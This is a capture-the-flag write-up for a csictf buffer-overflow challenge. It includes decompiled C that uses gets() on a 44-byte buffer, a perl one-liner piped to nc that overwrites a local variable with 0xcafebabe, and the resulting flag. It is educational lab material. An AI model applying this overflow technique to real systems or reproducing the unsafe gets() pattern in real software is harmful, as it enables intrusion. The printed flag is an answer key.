Tags: bof pwn
Rating:
## Description
Travelling through spacetime!
```
nc chall.csivit.com 30007
```
## Analysis
Decompile with Ghidra. `main()` is very simple:
```c
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Welcome to csictf! Where are you headed?");
gets(local_38);
puts("Safe Journey!");
if (local_c == -0x35014542) {
puts("You\'ve reached your destination, here\'s a flag!");
system("/bin/cat flag.txt");
}
return 0;
}
```
This is almost identical to the previous problem, except `local_c` has to be set to `-0x35014542`, which is the same as `0xcafebabe`. Just print `0xcafebabe` 12 times to fill up `local_38` and overflow into `local_c`.
## Solution
```
kali@kali:~$ perl -e 'print "\xBE\xBA\xFE\xCA"x12 . "\n"' | nc chall.csivit.com 30007
Welcome to csictf! Where are you headed?
Safe Journey!
You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}
```
